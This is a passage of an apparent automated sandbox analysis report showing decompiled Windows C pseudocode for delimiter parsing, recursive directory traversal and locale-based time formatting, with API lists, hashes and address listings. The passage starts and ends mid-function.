								_t120 = wcschr(L"=,;+/[] \t\"", _t150);
								_t154 = _t154 + 8;
								if(_t120 != 0) {
									break;
								}
								goto L11;
							}
						}
						if(_t150 == 0) {
							break;
						}
						_t124 = _v549;
						goto L8;
					}
					_v564 = _t148;
					if(_t148 == 0) {
						_t147 = _t148 | 0xffffffff;
						L31:
						__imp__??_V@YAXPAX@Z();
						return E011E6FD0(_t147, _t122, _v8 ^ _t152, _t143, _t147, _t150, _v28);
					}
					_t89 = _v28;
					if(_t89 == 0) {
						_t89 =  &_v548;
					}
					 *((short*)(_t89 + _t148 * 2)) = 0;
					if(_t122 != 0xffffffff) {
						_t90 = _v28;
						if(_t90 == 0) {
							_t90 =  &_v548;
						}
						_t91 = GetFileAttributesW(_t90);
						if(_t91 != 0xffffffff) {
							if((_t91 & 0x00000010) == 0) {
								goto L18;
							}
							goto L54;
						} else {
							L54:
							_t114 = _v28;
							_v564 = _t122;
							if(_t114 == 0) {
								_t114 =  &_v548;
							}
							 *((short*)(_t114 + _t122 * 2)) = 0;
							goto L18;
						}
					} else {
						L18:
						_t122 = _v28;
						if(_t122 == 0) {
							_t122 =  &_v548;
						}
						_t149 = 0;
						_t150 = 0x11d1628;
						do {
							_t24 = _t150 - 8; // 0x11d35b0
							_t92 =  *_t24;
							if(_t92 == 0) {
								goto L22;
							}
							__imp___wcsicmp(_t122, _t92);
							_t154 = _t154 + 8;
							if(_t92 == 0) {
								_t113 =  *_t150 & 0x0000ffff;
								if((_t113 & 0x00000004) != 0) {
									if( *0x1213cc9 != 0) {
										goto L25;
									}
									goto L22;
								}
								L25:
								_t128 = _v560;
								 *_v560 = _t113;
								L26:
								 *0x11fd0dc = _t149;
								if(_t149 == 0xffffffff) {
									if(_v28 == 0) {
										_t143 =  &_v548;
									}
									_t129 = 0x2d;
									if(E011DDFC0(0x2d, _t143, _t128) == 0x2d) {
										_t147 = 0x2d;
									} else {
										_v549 = 0;
										_t122 = 0;
										while(1) {
											_t150 =  *( *((intOrPtr*)(_v556 + 0x38)) + _t122 * 2) & 0x0000ffff;
											if(_t150 == 0) {
												break;
											}
											_t109 = 0;
											if(_t150 == 0x22) {
												_t110 = _v549;
												_t129 = _t129 & 0xffffff00 | _t110 == 0x00000000;
												_v549 = _t129;
												if(_t110 == 0) {
													_t109 = 0;
												} else {
													_t109 = 1;
												}
											} else {
												_t129 = _v549;
											}
											if(_t129 == 0) {
												if(_t109 != 0) {
													goto L42;
												}
												_t111 = iswspace(_t150);
												_t154 = _t154 + 4;
												if(_t111 != 0) {
													break;
												}
												_t129 = L"=,;";
												if(E011DD7D4(_t129, _t150) != 0 || _t150 == 0x2f) {
													break;
												} else {
													goto L42;
												}
											} else {
												L42:
												_t122 = _t122 + 1;
												continue;
											}
										}
										_t130 = _v556;
										L28:
										_t131 =  *((intOrPtr*)(_t130 + 0x38));
										_t32 = _t131 + 2; // 0x2
										_t143 = _t32;
										do {
											_t96 =  *_t131;
											_t131 = _t131 + 2;
										} while (_t96 != 0);
										_t133 = _t131 - _t143 >> 1;
										if(_t122 != _t133) {
											_t66 = _t133 + 1; // -1
											_t151 = _t66;
											_t134 =  *((intOrPtr*)(_v556 + 0x3c));
											if(_t134 == 0) {
												L76:
												_t136 = E011E00B0(_t151 + _t151);
												_v560 = _t136;
												if(_t136 == 0) {
													E011F9287(_t136);
													__imp__longjmp(0x120b8b8, 1);
												}
												_t122 = _t122 + _t122;
												_t143 = _t151;
												E011E1040(_t136, _t151,  *((intOrPtr*)(_v556 + 0x38)) + _t122);
												_t103 =  *((intOrPtr*)(_v556 + 0x3c));
												if( *((intOrPtr*)(_v556 + 0x3c)) == 0) {
													_t150 = _v560;
												} else {
													_t143 = _t151;
													_t150 = _v560;
													E011E18C0(_t150, _t151, _t103);
												}
												_t104 = _v556;
												 *(_t104 + 0x3c) = _t150;
												 *((short*)(_t122 +  *((intOrPtr*)(_t104 + 0x38)))) = 0;
												goto L31;
											}
											_t145 = _t134 + 2;
											do {
												_t108 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t108 != 0);
											_t151 = _t151 + (_t134 - _t145 >> 1);
											goto L76;
										}
									}
									goto L31;
								}
								_t130 = _v556;
								_t122 = _v564;
								if(_t149 == 0x14) {
									 *((intOrPtr*)(_t130 + 0x40)) = 1;
								}
								goto L28;
							}
							L22:
							_t150 = _t150 + 0x18;
							_t149 = _t149 + 1;
						} while (_t150 <= 0x11d1a18);
						_t128 = _v560;
						_t149 = _t149 | 0xffffffff;
						goto L26;
					}
				}
			}




















































                                                    0x011de040
                                                    0x011de04b
                                                    0x011de052
                                                    0x011de063
                                                    0x011de069
                                                    0x011de06b
                                                    0x011de075
                                                    0x011de07b
                                                    0x011de07e
                                                    0x011de085
                                                    0x011de089
                                                    0x011de090
                                                    0x011de095
                                                    0x011de09c
                                                    0x011ebd1d
                                                    0x011de0a2
                                                    0x011de0a2
                                                    0x011de0a2
                                                    0x011de0a8
                                                    0x011de0b5
                                                    0x011ebd27
                                                    0x00000000
                                                    0x011de0bb
                                                    0x011de0bb
                                                    0x011de0c0
                                                    0x011de0cb
                                                    0x011de0cf
                                                    0x011de0d4
                                                    0x011de212
                                                    0x011de21a
                                                    0x011de21d
                                                    0x011de225
                                                    0x011de310
                                                    0x011de22b
                                                    0x011de22b
                                                    0x011de22b
                                                    0x011de0e5
                                                    0x011de0e7
                                                    0x011de100
                                                    0x011de103
                                                    0x011de11c
                                                    0x011de11c
                                                    0x011de121
                                                    0x011ebd31
                                                    0x011ebd31
                                                    0x011de127
                                                    0x011de12b
                                                    0x011de12c
                                                    0x00000000
                                                    0x011de12c
                                                    0x011de10b
                                                    0x011de111
                                                    0x011de116
                                                    0x011de2d8
                                                    0x00000000
                                                    0x00000000
                                                    0x011de2de
                                                    0x011de2de
                                                    0x00000000
                                                    0x011de0ed
                                                    0x011de0f3
                                                    0x011de0f9
                                                    0x011de0fe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011de0fe
                                                    0x011de0e7
                                                    0x011de0dd
                                                    0x00000000
                                                    0x00000000
                                                    0x011de0df
                                                    0x00000000
                                                    0x011de0df
                                                    0x011de134
                                                    0x011de13c
                                                    0x011ebd3c
                                                    0x011de1ea
                                                    0x011de1ed
                                                    0x011de208
                                                    0x011de208
                                                    0x011de142
                                                    0x011de147
                                                    0x011ebd44
                                                    0x011ebd44
                                                    0x011de14f
                                                    0x011de156
                                                    0x011de2e5
                                                    0x011de2ea
                                                    0x011de328
                                                    0x011de328
                                                    0x011de2ed
                                                    0x011de2f6
                                                    0x011de320
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011de2f8
                                                    0x011de2f8
                                                    0x011de2f8
                                                    0x011de2fb
                                                    0x011de303
                                                    0x011de330
                                                    0x011de330
                                                    0x011de307
                                                    0x00000000
                                                    0x011de307
                                                    0x011de15c
                                                    0x011de15c
                                                    0x011de15c
                                                    0x011de161
                                                    0x011ebd4f
                                                    0x011ebd4f
                                                    0x011de167
                                                    0x011de169
                                                    0x011de170
                                                    0x011de170
                                                    0x011de170
                                                    0x011de175
                                                    0x00000000
                                                    0x00000000
                                                    0x011de179
                                                    0x011de17f
                                                    0x011de184
                                                    0x011de19d
                                                    0x011de1a2
                                                    0x011ebd61
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ebd67
                                                    0x011de1a8
                                                    0x011de1a8
                                                    0x011de1ae
                                                    0x011de1b1
                                                    0x011de1b1
                                                    0x011de1ba
                                                    0x011de237
                                                    0x011ebd6c
                                                    0x011ebd6c
                                                    0x011de23e
                                                    0x011de24b
                                                    0x011ebd77
                                                    0x011de251
                                                    0x011de251
                                                    0x011de258
                                                    0x011de260
                                                    0x011de269
                                                    0x011de270
                                                    0x00000000
                                                    0x00000000
                                                    0x011de272
                                                    0x011de277
                                                    0x011de2b8
                                                    0x011de2c0
                                                    0x011de2c3
                                                    0x011de2cb
                                                    0x011de317
                                                    0x011de2cd
                                                    0x011de2cd
                                                    0x011de2cd
                                                    0x011de279
                                                    0x011de279
                                                    0x011de279
                                                    0x011de281
                                                    0x011de288
                                                    0x00000000
                                                    0x00000000
                                                    0x011de28b
                                                    0x011de291
                                                    0x011de296
                                                    0x00000000
                                                    0x00000000
                                                    0x011de29a
                                                    0x011de2a6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011de283
                                                    0x011de283
                                                    0x011de283
                                                    0x00000000
                                                    0x011de283
                                                    0x011de281
                                                    0x011de2ad
                                                    0x011de1cd
                                                    0x011de1cd
                                                    0x011de1d0
                                                    0x011de1d0
                                                    0x011de1d3
                                                    0x011de1d3
                                                    0x011de1d6
                                                    0x011de1d9
                                                    0x011de1e0
                                                    0x011de1e4
                                                    0x011ebd87
                                                    0x011ebd87
                                                    0x011ebd8a
                                                    0x011ebd8f
                                                    0x011ebda5
                                                    0x011ebdad
                                                    0x011ebdaf
                                                    0x011ebdb7
                                                    0x011ebdb9
                                                    0x011ebdc5
                                                    0x011ebdc5
                                                    0x011ebdd1
                                                    0x011ebdd3
                                                    0x011ebddb
                                                    0x011ebde6
                                                    0x011ebdeb
                                                    0x011ebdff
                                                    0x011ebded
                                                    0x011ebded
                                                    0x011ebdef
                                                    0x011ebdf8
                                                    0x011ebdf8
                                                    0x011ebe05
                                                    0x011ebe0d
                                                    0x011ebe13
                                                    0x00000000
                                                    0x011ebe13
                                                    0x011ebd91
                                                    0x011ebd94
                                                    0x011ebd94
                                                    0x011ebd97
                                                    0x011ebd9a
                                                    0x011ebda3
                                                    0x00000000
                                                    0x011ebda3
                                                    0x011de1e4
                                                    0x00000000
                                                    0x011de24b
                                                    0x011de1bc
                                                    0x011de1c2
                                                    0x011de1cb
                                                    0x011de209
                                                    0x011de209
                                                    0x00000000
                                                    0x011de1cb
                                                    0x011de186
                                                    0x011de186
                                                    0x011de189
                                                    0x011de18a
                                                    0x011de192
                                                    0x011de198
                                                    0x00000000
                                                    0x011de198
                                                    0x011de156

                                                    APIs
                                                    • memset.MSVCRT ref: 011DE090
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • wcschr.MSVCRT ref: 011DE0F3
                                                    • wcschr.MSVCRT ref: 011DE10B
                                                    • _wcsicmp.MSVCRT ref: 011DE179
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE1ED
                                                    • iswspace.MSVCRT ref: 011DE28B
                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00007FE7,?,?,00000000), ref: 011DE2ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memsetwcschr$AttributesFile_wcsicmpiswspace
                                                    • String ID: :.\$=,;$=,;+/[] "
                                                    • API String ID: 313872294-843887632
                                                    • Opcode ID: 007c7f30d5d94d735cbdac762c08c37ab33b6a0c84e2a388316583db0c9ec13a
                                                    • Instruction ID: 020e0d1f864e88efa5b65822288a6ff789fc979fe5341ce17d0df71a42164fea
                                                    • Opcode Fuzzy Hash: 007c7f30d5d94d735cbdac762c08c37ab33b6a0c84e2a388316583db0c9ec13a
                                                    • Instruction Fuzzy Hash: 4FA1E730B062159BDF2CCBACD888BFE7BB1AF45319F050198D916AB291DB319D85CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DB89C, Relevance: 18.3, APIs: 12, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 52%
                                                    			E011DB89C(WCHAR* __ecx, short* __edx, signed int _a4) {
				signed int _v12;
				int _v24;
				char _v28;
				void* _v32;
				void _v552;
				struct _WIN32_FIND_DATAW _v1144;
				int _v1148;
				signed int _v1152;
				void* _v1156;
				char _v1160;
				intOrPtr _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t71;
				intOrPtr _t74;
				void* _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				signed char _t80;
				short _t83;
				short _t84;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t110;
				signed int _t116;
				WCHAR* _t119;
				intOrPtr* _t124;
				WCHAR* _t129;
				signed int _t131;
				intOrPtr* _t134;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t140;
				signed int _t144;
				short* _t146;
				void* _t148;
				short* _t150;
				void* _t151;
				int _t154;
				intOrPtr* _t155;
				void* _t159;
				signed int _t160;
				void* _t161;

				_t145 = __edx;
				_t71 =  *0x11fd0b4; // 0x1805bc26
				_v12 = _t71 ^ _t160;
				_t119 = __ecx;
				_v1152 = _a4;
				_t155 = __ecx;
				_v1148 = 0;
				_t150 =  &(__ecx[1]);
				do {
					_t74 =  *_t155;
					_t155 = _t155 + 2;
				} while (_t74 != 0);
				_t157 = _t155 - _t150 >> 1;
				if((_t155 - _t150 >> 1) + 2 > __edx) {
					L10:
					_t76 = 0;
					L8:
					_pop(_t151);
					return E011E6FD0(_t76, _t119, _v12 ^ _t160, _t145, _t151, _t157);
				}
				_t124 = __ecx;
				_t145 =  &(__ecx[1]);
				do {
					_t78 =  *_t124;
					_t124 = _t124 + 2;
				} while (_t78 != 0);
				_t157 = _v1152;
				_t126 = _t124 - _t145 >> 1;
				_t79 = (_t124 - _t145 >> 1) - 2;
				_v1164 = _t79;
				 *_t157 = _t79;
				_t80 = GetFileAttributesW(__ecx);
				if(_t80 == 0xffffffff) {
					_push(0);
					_push(GetLastError());
					E011DC5A2(_t126);
					goto L10;
				}
				if((_t80 & 0x00000010) != 0) {
					_t129 = _t119;
					_t146 =  &(_t129[1]);
					do {
						_t83 =  *_t129;
						_t129 =  &(_t129[1]);
					} while (_t83 != 0);
					_t131 = _t129 - _t146 >> 1;
					_t84 = 0x5c;
					_push(0x2a);
					if( *((intOrPtr*)(_t119 + _t131 * 2 - 2)) != _t84) {
						 *((short*)(_t119 + 4 + _t131 * 2)) = 0;
						_pop(_t145);
					} else {
						_t145 = 0;
						_pop(_t84);
					}
					_t119[_t131] = _t84;
					 *(_t119 + 2 + _t131 * 2) = _t145;
					_t86 = FindFirstFileW(_t119,  &_v1144);
					_v1156 = _t86;
					if(_t86 != 0xffffffff) {
						_t154 = 1;
						do {
							_t131 = ".";
							_t87 =  &(_v1144.cFileName);
							while(1) {
								_t145 =  *_t87;
								if(_t145 !=  *_t131) {
									break;
								}
								if(_t145 == 0) {
									L26:
									_t88 = 0;
									L28:
									if(_t88 == 0) {
										goto L57;
									}
									_t131 = L"..";
									_t96 =  &(_v1144.cFileName);
									while(1) {
										_t145 =  *_t96;
										if(_t145 !=  *_t131) {
											break;
										}
										if(_t145 == 0) {
											L34:
											_t97 = 0;
											L36:
											if(_t97 == 0) {
												goto L57;
											}
											_t134 =  &(_v1144.cFileName);
											_t145 = _t134 + 2;
											do {
												_t98 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t98 != _v1148);
											_t135 = _t134 - _t145;
											_t131 = _t135 >> 1;
											if(_t135 == 0) {
												goto L57;
											}
											if((_v1144.dwFileAttributes & 0x00000010) != 0) {
												_t99 =  *_t157;
												if(_t99 <= _t131) {
													_t99 = _t131;
												}
												 *_t157 = _t99;
												goto L57;
											}
											_v28 = 1;
											_v32 = 0;
											_v24 = 0x104;
											memset( &_v552, 0, 0x104);
											_t161 = _t161 + 0xc;
											if(E011E0C70( &_v552, ((0 | _v28 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
												SetLastError(8);
												L60:
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												L61:
												_t157 = GetLastError();
												FindClose(_v1156);
												if(_t154 != 0) {
													goto L10;
												}
												if(_t157 == 0x12) {
													goto L7;
												}
												_push(0);
												goto L64;
											}
											E011E0D89(_t145, _t119);
											_t148 = _v32;
											_t138 = _t148;
											if(_t148 == 0) {
												_t138 =  &_v552;
											}
											_t159 = _t138 + 2;
											do {
												_t110 =  *_t138;
												_t138 = _t138 + 2;
											} while (_t110 != _v1148);
											_t140 = _t138 - _t159 >> 1;
											if(_t148 == 0) {
												_t148 =  &_v552;
											}
											 *((short*)(_t148 + _t140 * 2 - 2)) = 0;
											E011E0CF2(_t148,  &(_v1144.cFileName));
											_t142 = _v32;
											if(_v32 == 0) {
												_t142 =  &_v552;
											}
											_t145 = _v24;
											if(E011DB89C(_t142, _v24,  &_v1160) == 0) {
												goto L60;
											} else {
												_t157 = _v1152;
												_t144 = _v1164 + _v1160;
												_t116 =  *_t157;
												if(_t116 <= _t144) {
													_t116 = _t144;
												}
												 *_t157 = _t116;
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												goto L57;
											}
										}
										_t145 =  *((intOrPtr*)(_t96 + 2));
										_t33 = _t131 + 2; // 0x2e
										if(_t145 !=  *_t33) {
											break;
										}
										_t96 = _t96 + 4;
										_t131 = _t131 + 4;
										if(_t145 != 0) {
											continue;
										}
										goto L34;
									}
									asm("sbb eax, eax");
									_t97 = _t96 | 0x00000001;
									goto L36;
								}
								_t145 =  *((intOrPtr*)(_t87 + 2));
								_t30 = _t131 + 2; // 0x200000
								if(_t145 !=  *_t30) {
									break;
								}
								_t87 = _t87 + 4;
								_t131 = _t131 + 4;
								if(_t145 != 0) {
									continue;
								}
								goto L26;
							}
							asm("sbb eax, eax");
							_t88 = _t87 | 0x00000001;
							goto L28;
							L57:
							_t154 = FindNextFileW(_v1156,  &_v1144);
						} while (_t154 != 0);
						goto L61;
					} else {
						_t157 = GetLastError();
						FindClose(0xffffffff);
						if(_t157 == 2 || _t157 == 0x12) {
							goto L7;
						} else {
							_push(0);
							L64:
							_push(_t157);
							E011DC5A2(_t131);
							_t76 = 0;
							goto L8;
						}
					}
				}
				L7:
				_t76 = 1;
				goto L8;
			}




















































                                                    0x011db89c
                                                    0x011db8a7
                                                    0x011db8ae
                                                    0x011db8b5
                                                    0x011db8b7
                                                    0x011db8be
                                                    0x011db8c3
                                                    0x011db8c9
                                                    0x011db8cc
                                                    0x011db8cc
                                                    0x011db8cf
                                                    0x011db8d2
                                                    0x011db8d9
                                                    0x011db8e0
                                                    0x011e9da8
                                                    0x011e9da8
                                                    0x011db928
                                                    0x011db92b
                                                    0x011db938
                                                    0x011db938
                                                    0x011db8e6
                                                    0x011db8ea
                                                    0x011db8ed
                                                    0x011db8ed
                                                    0x011db8f0
                                                    0x011db8f3
                                                    0x011db8f8
                                                    0x011db900
                                                    0x011db903
                                                    0x011db906
                                                    0x011db90c
                                                    0x011db90e
                                                    0x011db917
                                                    0x011e9d99
                                                    0x011e9da0
                                                    0x011e9da1
                                                    0x00000000
                                                    0x011e9da7
                                                    0x011db91f
                                                    0x011e9daf
                                                    0x011e9db1
                                                    0x011e9db4
                                                    0x011e9db4
                                                    0x011e9db7
                                                    0x011e9dba
                                                    0x011e9dc1
                                                    0x011e9dc5
                                                    0x011e9dc6
                                                    0x011e9dcd
                                                    0x011e9dd6
                                                    0x011e9ddb
                                                    0x011e9dcf
                                                    0x011e9dcf
                                                    0x011e9dd1
                                                    0x011e9dd1
                                                    0x011e9ddc
                                                    0x011e9de8
                                                    0x011e9ded
                                                    0x011e9df3
                                                    0x011e9dfc
                                                    0x011e9e28
                                                    0x011e9e29
                                                    0x011e9e29
                                                    0x011e9e2e
                                                    0x011e9e34
                                                    0x011e9e34
                                                    0x011e9e3a
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9e3f
                                                    0x011e9e56
                                                    0x011e9e56
                                                    0x011e9e5f
                                                    0x011e9e61
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9e67
                                                    0x011e9e6c
                                                    0x011e9e72
                                                    0x011e9e72
                                                    0x011e9e78
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9e7d
                                                    0x011e9e94
                                                    0x011e9e94
                                                    0x011e9e9d
                                                    0x011e9e9f
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9ea5
                                                    0x011e9eab
                                                    0x011e9eae
                                                    0x011e9eae
                                                    0x011e9eb1
                                                    0x011e9eb4
                                                    0x011e9ebd
                                                    0x011e9ebf
                                                    0x011e9ec1
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9ece
                                                    0x011e9fb6
                                                    0x011e9fba
                                                    0x011e9fbc
                                                    0x011e9fbc
                                                    0x011e9fbe
                                                    0x00000000
                                                    0x011e9fbe
                                                    0x011e9ed6
                                                    0x011e9edf
                                                    0x011e9eea
                                                    0x011e9eee
                                                    0x011e9efb
                                                    0x011e9f14
                                                    0x011e9fe1
                                                    0x011e9fe7
                                                    0x011e9fea
                                                    0x011e9ff0
                                                    0x011e9ff1
                                                    0x011e9ffd
                                                    0x011e9fff
                                                    0x011ea007
                                                    0x00000000
                                                    0x00000000
                                                    0x011ea010
                                                    0x00000000
                                                    0x00000000
                                                    0x011ea018
                                                    0x00000000
                                                    0x011ea018
                                                    0x011e9f21
                                                    0x011e9f26
                                                    0x011e9f29
                                                    0x011e9f2d
                                                    0x011e9f2f
                                                    0x011e9f2f
                                                    0x011e9f35
                                                    0x011e9f38
                                                    0x011e9f38
                                                    0x011e9f3b
                                                    0x011e9f3e
                                                    0x011e9f49
                                                    0x011e9f4d
                                                    0x011e9f4f
                                                    0x011e9f4f
                                                    0x011e9f57
                                                    0x011e9f69
                                                    0x011e9f6e
                                                    0x011e9f73
                                                    0x011e9f75
                                                    0x011e9f75
                                                    0x011e9f7b
                                                    0x011e9f8c
                                                    0x00000000
                                                    0x011e9f8e
                                                    0x011e9f8e
                                                    0x011e9f9a
                                                    0x011e9fa0
                                                    0x011e9fa4
                                                    0x011e9fa6
                                                    0x011e9fa6
                                                    0x011e9fab
                                                    0x011e9fad
                                                    0x011e9fb3
                                                    0x00000000
                                                    0x011e9fb3
                                                    0x011e9f8c
                                                    0x011e9e7f
                                                    0x011e9e83
                                                    0x011e9e87
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9e89
                                                    0x011e9e8c
                                                    0x011e9e92
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9e92
                                                    0x011e9e98
                                                    0x011e9e9a
                                                    0x00000000
                                                    0x011e9e9a
                                                    0x011e9e41
                                                    0x011e9e45
                                                    0x011e9e49
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9e4b
                                                    0x011e9e4e
                                                    0x011e9e54
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9e54
                                                    0x011e9e5a
                                                    0x011e9e5c
                                                    0x00000000
                                                    0x011e9fc0
                                                    0x011e9fd3
                                                    0x011e9fd5
                                                    0x00000000
                                                    0x011e9dfe
                                                    0x011e9e06
                                                    0x011e9e08
                                                    0x011e9e11
                                                    0x00000000
                                                    0x011e9e20
                                                    0x011e9e20
                                                    0x011ea019
                                                    0x011ea019
                                                    0x011ea01a
                                                    0x011ea020
                                                    0x00000000
                                                    0x011ea022
                                                    0x011e9e11
                                                    0x011e9dfc
                                                    0x011db925
                                                    0x011db927
                                                    0x00000000

                                                    APIs
                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FE7,00000000), ref: 011DB90E
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 4527101172f83b501611864d7501998ab0620b3570cfab8cfee1841df50d60d9
                                                    • Instruction ID: 03a1585ae39d91d889194c503c58d7a2b4bc2695e7d62243d6e44f0e521deefa
                                                    • Opcode Fuzzy Hash: 4527101172f83b501611864d7501998ab0620b3570cfab8cfee1841df50d60d9
                                                    • Instruction Fuzzy Hash: D891257290051A8BDF2DDFA8C8486FEB7F1EF54218F4585ADDA0AD7244FB319A81CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D96A0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 237timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E011D96A0(void* __ecx, void* __edx, signed int _a4, unsigned int _a8) {
				signed int _v8;
				short _v76;
				short _v332;
				signed short _v334;
				signed short _v336;
				signed int _v338;
				signed int _v340;
				struct _SYSTEMTIME _v348;
				signed int _v352;
				intOrPtr _v356;
				void* _v360;
				struct _FILETIME _v368;
				struct _FILETIME _v376;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				char* _t67;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed short _t80;
				signed int _t85;
				signed int _t88;
				signed int _t92;
				signed int _t99;
				void* _t106;
				void* _t111;
				signed int _t112;
				signed int _t114;
				void* _t116;
				void* _t119;
				signed int _t121;
				signed int _t122;
				void* _t123;
				signed int _t124;
				signed int _t126;
				signed int _t127;
				intOrPtr* _t131;
				void* _t133;
				int _t134;
				void* _t136;
				signed int _t138;
				signed int _t140;
				signed int _t141;
				void* _t142;

				_t58 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t58 ^ _t141;
				_t139 = _a4;
				_t136 = __edx;
				if(__ecx != 0) {
					E011F3C49(__ecx,  &_v368);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v368);
				}
				FileTimeToLocalFileTime( &_v368,  &_v376);
				FileTimeToSystemTime( &_v376,  &_v348);
				if(_t136 != 1) {
					__eflags =  *0x1213cc9;
					if( *0x1213cc9 == 0) {
						__eflags =  *0x11fd0cc;
						_t67 = "a";
						_t114 = _v340 & 0x0000ffff;
						if( *0x11fd0cc == 0) {
							_t67 = " ";
						} else {
							__eflags = _t114 - 0xc;
							if(__eflags < 0) {
								__eflags = _t114;
								if(_t114 == 0) {
									_t114 = 0xc;
								}
							} else {
								if(__eflags > 0) {
									__eflags = _t114;
								}
								_t67 = "p";
							}
						}
						_push(_t67);
						_push(_v338 & 0x0000ffff);
						_push(0x11ff81c);
						E011E274C( &_v76, 0x20, L"%02d%s%02d%s", _t114);
						L48:
						__eflags = _t139;
						if(_t139 != 0) {
							_t130 = _a8;
							E011E1040(_t139, _a8,  &_v76);
							_t116 = _t139 + 2;
							do {
								_t73 =  *_t139;
								_t139 = _t139 + 2;
								__eflags = _t73;
							} while (_t73 != 0);
							goto L6;
						}
						_t131 =  &_v76;
						_t119 = _t131 + 2;
						do {
							_t76 =  *_t131;
							_t131 = _t131 + 2;
							__eflags = _t76;
						} while (_t76 != 0);
						_t130 = _t131 - _t119 >> 1;
						_t74 = E011E2616( &_v76, _t131 - _t119 >> 1);
						goto L7;
					}
					_v352 = 0;
					_t79 = GetLocaleInfoW(E011E41A4(), 0x1003,  &_v332, 0x80);
					__eflags = _t79;
					if(_t79 != 0) {
						L20:
						_t80 = _v332;
						_t136 =  &_v332;
						__eflags = _t80;
						if(_t80 == 0) {
							L37:
							_t85 = GetTimeFormatW(E011E41A4(), 2,  &_v348,  &_v332,  &_v76, 0x20);
							__eflags = _t85;
							if(_t85 == 0) {
								_v76 = _t85;
							}
							goto L48;
						}
						_t112 = _t80 & 0x0000ffff;
						_t121 = 0;
						__eflags = 0;
						do {
							__eflags = _t112 - 0x27;
							if(_t112 != 0x27) {
								__eflags = _t121;
								if(_t121 == 0) {
									__eflags = _t112 - 0x68;
									if(_t112 == 0x68) {
										L29:
										_t122 = 0;
										__eflags = 0;
										do {
											_t136 = _t136 + 2;
											_t122 = _t122 + 1;
											__eflags =  *_t136 - _t112;
										} while ( *_t136 == _t112);
										_t133 = _t136 +  ~_t122 * 2;
										_v360 = _t133;
										_t136 = _t133 + 2;
										__eflags = _t122 - 1;
										if(_t122 != 1) {
											L35:
											_t121 = _v352;
											goto L36;
										}
										_t123 = _t133;
										_v356 = _t123 + 2;
										do {
											_t92 =  *_t123;
											_t123 = _t123 + 2;
											__eflags = _t92;
										} while (_t92 != 0);
										_t124 = _t123 - _v356;
										__eflags = _t124;
										memmove(_t136, _t133, 2 + (_t124 >> 1) * 2);
										_t142 = _t142 + 0xc;
										 *_v360 = _t112;
										goto L35;
									}
									__eflags = _t112 - 0x48;
									if(_t112 == 0x48) {
										goto L29;
									}
									__eflags = _t112 - 0x6d;
									if(_t112 != 0x6d) {
										goto L36;
									}
									goto L29;
								}
								_t136 = _t136 + 2;
								goto L36;
							}
							_t136 = _t136 + 2;
							__eflags = _t121;
							_t121 = 0 | _t121 == 0x00000000;
							_v352 = _t121;
							L36:
							_t88 =  *(_t136 + 2) & 0x0000ffff;
							_t136 = _t136 + 2;
							_t112 = _t88;
							__eflags = _t88;
						} while (_t88 != 0);
						goto L37;
					}
					_t126 =  &_v332;
					_t134 = 0x80;
					_t138 = L"HH:mm:ss t" - _t126;
					__eflags = _t138;
					while(1) {
						_t25 = _t134 + 0x7fffff7e; // 0x7ffffffe
						__eflags = _t25;
						if(_t25 == 0) {
							break;
						}
						_t99 =  *(_t138 + _t126) & 0x0000ffff;
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						 *_t126 = _t99;
						_t126 = _t126 + 2;
						_t134 = _t134 - 1;
						__eflags = _t134;
						if(_t134 != 0) {
